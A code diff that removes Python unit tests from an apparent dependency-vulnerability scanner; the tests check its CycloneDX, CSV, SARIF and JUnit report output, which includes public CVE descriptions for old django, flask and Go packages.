- output = json.loads(cyclonedx.get_json_output())
-
- # then
- assert output["$schema"] == "http://cyclonedx.org/schema/bom-1.4.schema.json"
- assert len(output["components"]) == 8
- assert len(output["dependencies"]) == 8
- assert len(output["vulnerabilities"]) == 8
-
- assert sorted(output["components"], key=itemgetter("purl")) == sorted([
- {
- "type": "library",
- "bom-ref": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2",
- "name": "django",
- "version": "1.2",
- "licenses": [{"license": {"name": "OSI_BDS"}}],
- "purl": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2",
- },
- {
- "type": "library",
- "bom-ref": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6",
- "name": "flask",
- "version": "0.6",
- "licenses": [
- {"license": {"name": "DUMMY_OTHER_LICENSE, ANOTHER_DOMMY_LICENSE"}},
- {"license": {"name": "OSI_APACHE"}},
- ],
- "purl": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6",
- },
- {
- "type": "library",
- "bom-ref": 
"pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0", - "name": "github.com/dgrijalva/jwt-go", - "version": "v3.2.0", - "licenses": [{"license": {"name": "Unknown"}}], - "purl": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0", - }, - { - "type": "library", - "bom-ref": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41", - "name": "github.com/miekg/dns", - "version": "v1.1.41", - "licenses": [{"license": {"name": "Unknown"}}], - "purl": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41", - }, - { - "type": "library", - "bom-ref": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90", - "name": "github.com/prometheus/client_model", - "version": "v0.0.0-20190129233127-fd36f4220a90", - "licenses": [{"license": {"name": "Unknown"}}], - "purl": "pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90", - }, - { - "type": "library", - "bom-ref": "pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1", - "name": "golang.org/x/crypto", - "version": "v0.0.1", - "licenses": [{"license": {"name": "Unknown"}}], - "purl": "pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1", - }, - { - "type": "library", - "bom-ref": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0", - "name": "requests", - "version": "2.26.0", - "licenses": [{"license": {"name": "OSI_APACHE"}}], - "purl": "pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0", - }, - { - "type": "library", - "bom-ref": "pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0", - "name": "requests", - "version": "2.26.0", - "licenses": [{"license": {"name": "OSI_APACHE"}}], - "purl": "pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0", - }, - ], 
key=itemgetter("purl")) - - -def test_get_csv_report(sca_package_report, tmp_path: Path): - csv_sbom_report = CSVSBOM() - csv_sbom_report.add_report(report=sca_package_report, git_org="acme", git_repository="bridgecrewio/example") - csv_sbom_report.persist_report_oss_packages(file_name=FILE_NAME_OSS_PACKAGES, is_api_key=True, - output_path=str(tmp_path)) - output_file_path = tmp_path / FILE_NAME_OSS_PACKAGES - csv_output = output_file_path.read_text() - csv_output_str = csv_sbom_report.get_csv_output_packages(check_type=CheckType.SCA_PACKAGE) - - # then - expected_csv_output = [ - 'Package,Version,Path,Line(s),Git Org,Git Repository,Vulnerability,Severity,Description,Licenses,Fix Version,Registry URL,Root Package,Root Version', - 'django,1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2019-19844,CRITICAL,"Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. 
(One mitigation in the new releases is to send password reset tokens only to the registered user email address.)",OSI_BDS,1.11.27,,,', - 'django,1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2016-6186,MEDIUM,"Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.",OSI_BDS,1.8.14,,,', - 'django,1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2016-7401,HIGH,"The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.",OSI_BDS,1.8.15,,,', - 'django,1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2021-33203,MEDIUM,"Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.",OSI_BDS,2.2.24,,,', - 'flask,0.6,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2019-1010083,HIGH,The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. 
NOTE: this may overlap CVE-2018-1000656.,"OSI_APACHE, DUMMY_OTHER_LICENSE",1.0,,,', - 'flask,0.6,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2018-1000656,HIGH,The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.,"OSI_APACHE, DUMMY_OTHER_LICENSE",0.12.3,,,', - 'golang.org/x/crypto,v0.0.1,/path/to/go.sum,,acme,bridgecrewio/example,CVE-2020-29652,HIGH,A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.,Unknown,0.0.2,,,', - 'github.com/dgrijalva/jwt-go,v3.2.0,/path/to/go.sum,,acme,bridgecrewio/example,CVE-2020-26160,HIGH,"jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\""aud\\""] (which is allowed by the specification). Because the type assertion fails, \\""\\"" is the value of aud. 
This is a security problem if the JWT token is presented to a service that lacks its own audience check.",Unknown,4.0.0rc1,,,', - 'github.com/miekg/dns,v1.1.41,/path/to/go.sum,,acme,bridgecrewio/example,,,,Unknown,N/A,,,', - 'github.com/prometheus/client_model,v0.0.0-20190129233127-fd36f4220a90,/path/to/go.sum,,acme,bridgecrewio/example,,,,Unknown,N/A,,,', - 'requests,2.26.0,/path/to/requirements.txt,,acme,bridgecrewio/example,,,,OSI_APACHE,N/A,,,', - 'requests,2.26.0,/path/to/sub/requirements.txt,,acme,bridgecrewio/example,,,,OSI_APACHE,N/A,,,', ''] - csv_output_as_list = csv_output.split("\n") - assert csv_output_as_list == expected_csv_output - - expected_csv_output_str = [ - 'Package,Version,Path,Line(s),Git Org,Git Repository,Vulnerability,Severity,Description,Licenses,Fix Version,Registry URL,Root Package,Root Version', - '"django",1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2019-19844,CRITICAL,"Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. 
(One mitigation in the new releases is to send password reset tokens only to the registered user email address.)","OSI_BDS",1.11.27,,,', - '"django",1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2016-6186,MEDIUM,"Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.","OSI_BDS",1.8.14,,,', - '"django",1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2016-7401,HIGH,"The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.","OSI_BDS",1.8.15,,,', - '"django",1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2021-33203,MEDIUM,"Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.","OSI_BDS",2.2.24,,,', - '"flask",0.6,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2019-1010083,HIGH,"The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. 
NOTE: this may overlap CVE-2018-1000656.","OSI_APACHE, DUMMY_OTHER_LICENSE",1.0,,,', - '"flask",0.6,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2018-1000656,HIGH,"The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.","OSI_APACHE, DUMMY_OTHER_LICENSE",0.12.3,,,', - '"golang.org/x/crypto",v0.0.1,/path/to/go.sum,,acme,bridgecrewio/example,CVE-2020-29652,HIGH,"A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.","Unknown",0.0.2,,,', - '"github.com/dgrijalva/jwt-go",v3.2.0,/path/to/go.sum,,acme,bridgecrewio/example,CVE-2020-26160,HIGH,"jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\"aud\\"] (which is allowed by the specification). Because the type assertion fails, \\"\\" is the value of aud. 
This is a security problem if the JWT token is presented to a service that lacks its own audience check.","Unknown",4.0.0rc1,,,', - '"github.com/miekg/dns",v1.1.41,/path/to/go.sum,,acme,bridgecrewio/example,,,"","Unknown",N/A,,,', - '"github.com/prometheus/client_model",v0.0.0-20190129233127-fd36f4220a90,/path/to/go.sum,,acme,bridgecrewio/example,,,"","Unknown",N/A,,,', - '"requests",2.26.0,/path/to/requirements.txt,,acme,bridgecrewio/example,,,"","OSI_APACHE",N/A,,,', - '"requests",2.26.0,/path/to/sub/requirements.txt,,acme,bridgecrewio/example,,,"","OSI_APACHE",N/A,,,', ''] - csv_output_str_as_list = csv_output_str.split("\n") - assert csv_output_str_as_list == expected_csv_output_str - - -def test_sarif_output(sca_package_report_with_skip_scope_function): - # The creation of sarif_json may change the input report. in order not to affect the other tests, we use - # a report that is unique for the scope of the function - - # when - sarif_output = Sarif(reports=[sca_package_report_with_skip_scope_function], tool="Checkov").json - - # then - sarif_output["runs"][0]["tool"]["driver"]["version"] = "2.0.x" - assert sarif_output == { - "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", - "version": "2.1.0", - "runs": [ - { - "tool": { - "driver": { - "name": "Checkov", - "version": "2.0.x", - "informationUri": "https://checkov.io", - "rules": [ - { - "id": "DUMMY_OTHER_LICENSE_flask@0.6", - "name": "License DUMMY_OTHER_LICENSE - flask: 0.6", - "shortDescription": {"text": "License DUMMY_OTHER_LICENSE - flask: 0.6"}, - "fullDescription": {"text": "Package flask@0.6 has license DUMMY_OTHER_LICENSE"}, - "help": {"text": "SCA license\nResource: path/to/requirements.txt.flask"}, - "defaultConfiguration": {"level": "error"}, - }, - { - "id": "CVE-2019-19844_django@1.2", - "name": "CVE-2019-19844 - django: 1.2", - "shortDescription": {"text": "CVE-2019-19844 - django: 1.2"}, - "fullDescription": { - "text": "Django 
before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)" - }, - "help": { - "text": "SCA package scan\nResource: path/to/requirements.txt.django\nStatus: fixed in 3.0.1, 2.2.9, 1.11.27" - }, - "defaultConfiguration": {"level": "error"}, - "properties": {"security-severity": "9.8"}, - "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844", - }, - { - "id": "CVE-2016-6186_django@1.2", - "name": "CVE-2016-6186 - django: 1.2", - "shortDescription": {"text": "CVE-2016-6186 - django: 1.2"}, - "fullDescription": { - "text": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML." - }, - "help": { - "text": "SCA package scan\nResource: path/to/requirements.txt.django\nStatus: fixed in 1.9.8, 1.8.14" - }, - "defaultConfiguration": {"level": "error"}, - "properties": {"security-severity": "6.1"}, - "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186", - }, - { - "id": "CVE-2016-7401_django@1.2", - "name": "CVE-2016-7401 - django: 1.2", - "shortDescription": {"text": "CVE-2016-7401 - django: 1.2"}, - "fullDescription": { - "text": "The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies." 
- }, - "help": { - "text": "SCA package scan\nResource: path/to/requirements.txt.django\nStatus: fixed in 1.9.10, 1.8.15" - }, - "defaultConfiguration": {"level": "error"}, - "properties": {"security-severity": "7.5"}, - "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2016-7401", - }, - { - "id": "CVE-2021-33203_django@1.2", - "name": "CVE-2021-33203 - django: 1.2", - "shortDescription": {"text": "CVE-2021-33203 - django: 1.2"}, - "fullDescription": { - "text": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories." - }, - "help": { - "text": "SCA package scan\nResource: path/to/requirements.txt.django\nStatus: fixed in 3.2.4, 3.1.12, 2.2.24" - }, - "defaultConfiguration": {"level": "error"}, - "properties": {"security-severity": "4.9"}, - "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203", - }, - { - "id": "CVE-2019-1010083_flask@0.6", - "name": "CVE-2019-1010083 - flask: 0.6", - "shortDescription": {"text": "CVE-2019-1010083 - flask: 0.6"}, - "fullDescription": { - "text": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656." 
- }, - "help": { - "text": "SCA package scan\nResource: path/to/requirements.txt.flask\nStatus: fixed in 1.0" - }, - "defaultConfiguration": {"level": "error"}, - "properties": {"security-severity": "7.5"}, - "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010083", - }, - { - "id": "CVE-2018-1000656_flask@0.6", - "name": "CVE-2018-1000656 - flask: 0.6", - "shortDescription": {"text": "CVE-2018-1000656 - flask: 0.6"}, - "fullDescription": { - "text": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083." - }, - "help": { - "text": "SCA package scan\nResource: path/to/requirements.txt.flask\nStatus: fixed in 0.12.3" - }, - "defaultConfiguration": {"level": "error"}, - "properties": {"security-severity": "7.5"}, - "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000656", - }, - { - "id": "CVE-2020-26160_github.com/dgrijalva/jwt-go@v3.2.0", - "name": "CVE-2020-26160 - github.com/dgrijalva/jwt-go: v3.2.0", - "shortDescription": {"text": "CVE-2020-26160 - github.com/dgrijalva/jwt-go: v3.2.0"}, - "fullDescription": { - "text": 'jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\"aud\\"] (which is allowed by the specification). Because the type assertion fails, \\"\\" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.' 
- }, - "help": { - "text": "SCA package scan\nResource: path/to/go.sum.github.com/dgrijalva/jwt-go\nStatus: fixed in v4.0.0-preview1" - }, - "defaultConfiguration": {"level": "error"}, - "properties": {"security-severity": "7.7"}, - "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2020-26160", - }, - { - "id": "CVE-2020-29652_golang.org/x/crypto@v0.0.1", - "name": "CVE-2020-29652 - golang.org/x/crypto: v0.0.1", - "shortDescription": {"text": "CVE-2020-29652 - golang.org/x/crypto: v0.0.1"}, - "fullDescription": { - "text": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers." - }, - "help": { - "text": "SCA package scan\nResource: path/to/go.sum.golang.org/x/crypto\nStatus: fixed in v0.0.2" - }, - "defaultConfiguration": {"level": "error"}, - "properties": {"security-severity": "7.5"}, - "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", - }, - ], - "organization": "bridgecrew", - } - }, - "results": [ - { - "ruleId": "DUMMY_OTHER_LICENSE_flask@0.6", - "ruleIndex": 0, - "level": "error", - "attachments": [], - "message": {"text": "License DUMMY_OTHER_LICENSE - flask: 0.6"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": {"uri": "path/to/requirements.txt"}, - "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "flask: 0.6"}}, - } - } - ], - }, - { - "ruleId": "CVE-2019-19844_django@1.2", - "ruleIndex": 1, - "level": "error", - "attachments": [], - "message": {"text": "CVE-2019-19844 - django: 1.2"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": {"uri": "path/to/requirements.txt"}, - "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "django: 1.2"}}, - } - } - ], - }, - { - "ruleId": "CVE-2016-6186_django@1.2", - "ruleIndex": 2, - "level": "warning", - "attachments": [], - "message": {"text": "CVE-2016-6186 - django: 1.2"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": 
{"uri": "path/to/requirements.txt"}, - "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "django: 1.2"}}, - } - } - ], - }, - { - "ruleId": "CVE-2016-7401_django@1.2", - "ruleIndex": 3, - "level": "error", - "attachments": [], - "message": {"text": "CVE-2016-7401 - django: 1.2"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": {"uri": "path/to/requirements.txt"}, - "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "django: 1.2"}}, - } - } - ], - }, - { - "ruleId": "CVE-2021-33203_django@1.2", - "ruleIndex": 4, - "level": "warning", - "attachments": [], - "message": {"text": "CVE-2021-33203 - django: 1.2"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": {"uri": "path/to/requirements.txt"}, - "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "django: 1.2"}}, - } - } - ], - }, - { - "ruleId": "CVE-2019-1010083_flask@0.6", - "ruleIndex": 5, - "level": "error", - "attachments": [], - "message": {"text": "CVE-2019-1010083 - flask: 0.6"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": {"uri": "path/to/requirements.txt"}, - "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "flask: 0.6"}}, - } - } - ], - }, - { - "ruleId": "CVE-2018-1000656_flask@0.6", - "ruleIndex": 6, - "level": "error", - "attachments": [], - "message": {"text": "CVE-2018-1000656 - flask: 0.6"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": {"uri": "path/to/requirements.txt"}, - "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "flask: 0.6"}}, - } - } - ], - }, - { - "ruleId": "CVE-2020-26160_github.com/dgrijalva/jwt-go@v3.2.0", - "ruleIndex": 7, - "level": "error", - "attachments": [], - "message": {"text": "CVE-2020-26160 - github.com/dgrijalva/jwt-go: v3.2.0"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": {"uri": "path/to/go.sum"}, - "region": { - "startLine": 1, - "endLine": 1, - "snippet": {"text": "github.com/dgrijalva/jwt-go: v3.2.0"}, - }, - 
} - } - ], - }, - { - "ruleId": "CVE-2020-29652_golang.org/x/crypto@v0.0.1", - "ruleIndex": 8, - "level": "error", - "attachments": [], - "message": {"text": "CVE-2020-29652 - golang.org/x/crypto: v0.0.1"}, - "locations": [ - { - "physicalLocation": { - "artifactLocation": {"uri": "path/to/go.sum"}, - "region": { - "startLine": 1, - "endLine": 1, - "snippet": {"text": "golang.org/x/crypto: v0.0.1"}, - }, - } - } - ], - "suppressions": [{"kind": "external", "justification": "CVE-2020-29652 is skipped"}], - }, - ], - } - ], - } - - -def test_get_junit_xml_string(sca_package_report_with_skip): - # given - report = sca_package_report_with_skip - - # when - test_suites = [report.get_test_suite()] - junit_xml_output = report.get_junit_xml_string(test_suites) - - # then - assert ( - xml.dom.minidom.parseString(junit_xml_output).toprettyxml() - == xml.dom.minidom.parseString( - "".join( - [ - '\n', - '\n', - '\t\n', - '\t\t\n', - '\t\t\t\n', - "Description: Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. 
(One mitigation in the new releases is to send password reset tokens only to the registered user email address.)\n", - "Link: https://nvd.nist.gov/vuln/detail/CVE-2019-19844\n", - "Published Date: 2019-12-18T20:15:00+01:00\n", - "Base Score: 9.8\n", - "Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n", - "Risk Factors: {'Severity': 'Critical', 'HasFix': True, 'DoS': False, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n", - "Fix Details:\n", - " Status: fixed in 3.0.1, 2.2.9, 1.11.27\n", - " Fixed Version: 1.11.27\n", - "\n", - "Resource: path/to/requirements.txt.django\n", - "File: /path/to/requirements.txt: 0-0\n", - "\n", - "\t\t0 | django: 1.2\n", - "\t\t\n", - '\t\t\n', - '\t\t\t\n', - "Description: Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.\n", - "Link: https://nvd.nist.gov/vuln/detail/CVE-2016-6186\n", - "Published Date: 2016-08-05T17:59:00+02:00\n", - "Base Score: 6.1\n", - "Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n", - "Risk Factors: {'Severity': 'Medium', 'HasFix': True, 'DoS': False, 'AttackVector': 'network', 'AttackComplexity': 'low', 'Exploit exists': True}\n", - "Fix Details:\n" - " Status: fixed in 1.9.8, 1.8.14\n", - " Fixed Version: 1.8.14\n", - "\n", - "Resource: path/to/requirements.txt.django\n", - "File: /path/to/requirements.txt: 0-0\n", - "\n", - "\t\t0 | django: 1.2\n", - "\t\t\n", - '\t\t\n', - '\t\t\t\n', - "Description: The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.\n", - "Link: https://nvd.nist.gov/vuln/detail/CVE-2016-7401\n", - "Published Date: 
2016-10-03T20:59:00+02:00\n", - "Base Score: 7.5\n", - "Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n", - "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': False, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n", - "Fix Details:\n", - " Status: fixed in 1.9.10, 1.8.15\n", - " Fixed Version: 1.8.15\n", - "\n", - "Resource: path/to/requirements.txt.django\n", - "File: /path/to/requirements.txt: 0-0\n", - "\n", - "\t\t0 | django: 1.2\n", - "\t\t\n", - '\t\t\n', - '\t\t\t\n', - "Description: Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.\n", - "Link: https://nvd.nist.gov/vuln/detail/CVE-2021-33203\n", - "Published Date: 2021-06-08T20:15:00+02:00\n", - "Base Score: 4.9\n", - "Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n", - "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': False, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n", - "Fix Details:\n" - " Status: fixed in 3.2.4, 3.1.12, 2.2.24\n", - " Fixed Version: 2.2.24\n", - "\n", - "Resource: path/to/requirements.txt.django\n", - "File: /path/to/requirements.txt: 0-0\n", - "\n", - "\t\t0 | django: 1.2\n", - "\t\t\n", - '\t\t\n', - '\t\t\t\n', - "Description: The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. 
NOTE: this may overlap CVE-2018-1000656.\n", - "Link: https://nvd.nist.gov/vuln/detail/CVE-2019-1010083\n", - "Published Date: 2019-07-17T16:15:00+02:00\n", - "Base Score: 7.5\n", - "Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n", - "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': True, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n", - "Fix Details:\n" - " Status: fixed in 1.0\n", - " Fixed Version: 1.0\n", - "\n", - "Resource: path/to/requirements.txt.flask\n", - "File: /path/to/requirements.txt: 0-0\n", - "\n", - "\t\t0 | flask: 0.6\n", - "\t\t\n", - '\t\t\n', - '\t\t\t\n', - "Description: The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.\n", - "Link: https://nvd.nist.gov/vuln/detail/CVE-2018-1000656\n", - "Published Date: 2018-08-20T21:31:00+02:00\n", - "Base Score: 7.5\n", - "Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n", - "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': True, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n", - "Fix Details:\n" - " Status: fixed in 0.12.3\n" - " Fixed Version: 0.12.3\n" - "\n", - "Resource: path/to/requirements.txt.flask\n", - "File: /path/to/requirements.txt: 0-0\n", - "\n", - "\t\t0 | flask: 0.6\n", - "\t\t\n", - '\t\t\n', - '\t\t\t\n', - "Description: jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\"aud\\"] (which is allowed by the specification). Because the type assertion fails, \\"\\" is the value of aud. 
This is a security problem if the JWT token is presented to a service that lacks its own audience check.\n", - "Link: https://nvd.nist.gov/vuln/detail/CVE-2020-26160\n", - "Published Date: 2020-09-30T20:15:00+02:00\n", - "Base Score: 7.7\n", - "Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n", - "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': True, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n", - "Fix Details:\n" - " Status: fixed in v4.0.0-preview1\n", - " Fixed Version: 4.0.0rc1\n", - "\n", - "Resource: path/to/go.sum.github.com/dgrijalva/jwt-go\n", - "File: /path/to/go.sum: 0-0\n", - "\n", - "\t\t0 | github.com/dgrijalva/jwt-go: v3.2.0\n", - "\t\t\n", - '\t\t\n', - '\t\t\t\n', - "\t\t\n", - "\t\n", - "\n", - ] - ) - ).toprettyxml() - ) diff --git a/tests/sca_package/test_runner.py b/tests/sca_package/test_runner.py deleted file mode 100644 index 7757fa28d36..00000000000 --- a/tests/sca_package/test_runner.py +++ /dev/null 
